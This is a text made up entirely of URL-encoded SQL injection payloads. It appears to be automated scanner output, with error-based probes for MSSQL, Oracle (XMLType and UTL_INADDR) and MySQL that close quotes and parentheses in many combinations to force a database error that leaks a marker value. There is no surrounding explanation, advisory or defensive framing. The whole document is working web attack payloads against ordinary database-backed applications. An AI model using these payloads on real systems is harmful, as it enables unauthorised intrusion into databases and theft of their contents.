foo%27%7C%7C%28SELECT%20%27bQJr%27%20WHERE%207035%3D7035%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20%29%7C%7C%27 foo%27%2B%28SELECT%20zCxL%20WHERE%208517%3D8517%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20%29%2B%27 foo%27%2B%28SELECT%20%27OmwB%27%20WHERE%206437%3D6437%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20%29%2B%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20%23 foo%29%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 foo%27%29%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 foo%27%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 foo%22%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 foo%29%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%289522%3D9522 foo%29%29%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%288963%3D8963 foo%29%29%29%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%289759%3D9759 foo%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 foo%27%29%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27jTER%27%3D%27jTER foo%27%29%29%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%27KPrM%27%3D%27KPrM foo%27%29%29%29%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%27QsBr%27%3D%27QsBr foo%27%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27pyOJ%27%3D%27pyOJ foo%27%29%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27QJWq%27%20LIKE%20%27QJWq foo%27%29%29%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%27QMJJ%27%20LIKE%20%27QMJJ foo%27%29%29%29%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%27Tovo%27%20LIKE%20%27Tovo foo%27%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27UfLf%27%20LIKE%20%27UfLf foo%22%29%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%22cKAO%22%3D%22cKAO foo%22%29%29%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%22NUpi%22%3D%22NUpi foo%22%29%29%29%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%22Xgrz%22%3D%22Xgrz foo%22%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%22SLGN%22%3D%22SLGN foo%22%29%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%22Efcm%22%20LIKE%20%22Efcm foo%22%29%29%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%22PpPH%22%20LIKE%20%22PpPH foo%22%29%29%29%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%22McoR%22%20LIKE%20%22McoR foo%22%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%22ejFn%22%20LIKE%20%22ejFn foo%25%27%29%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27%25%27%3D%27 foo%25%27%29%29%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%27%25%27%3D%27 foo%25%27%29%29%29%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%27%25%27%3D%27 foo%25%27%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27%25%27%3D%27 foo%00%27%29%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27WjvE%27%3D%27WjvE foo%00%27%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27oaFp%27%3D%27oaFp foo%27%29%20WHERE%201840%3D1840%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20--%20 foo%22%29%20WHERE%202857%3D2857%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20--%20 foo%29%20WHERE%207994%3D7994%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20--%20 foo%27%20WHERE%207213%3D7213%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20--%20 foo%22%20WHERE%203782%3D3782%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20--%20 foo%20WHERE%203461%3D3461%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20--%20 foo%27%7C%7C%28SELECT%20%27pFVm%27%20FROM%20DUAL%20WHERE%207434%3D7434%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20%29%7C%7C%27 foo%27%7C%7C%28SELECT%20%27FWiz%27%20WHERE%203474%3D3474%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20%29%7C%7C%27 foo%27%2B%28SELECT%20xqHZ%20WHERE%204221%3D4221%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20%29%2B%27 foo%27%2B%28SELECT%20%27yJoO%27%20WHERE%202074%3D2074%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20%29%2B%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%205974%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285974%3D5974%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20%23 foo%29%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29 foo%27%29%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29 foo%27%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29 foo%22%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29 foo%29%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%288982%3D8982 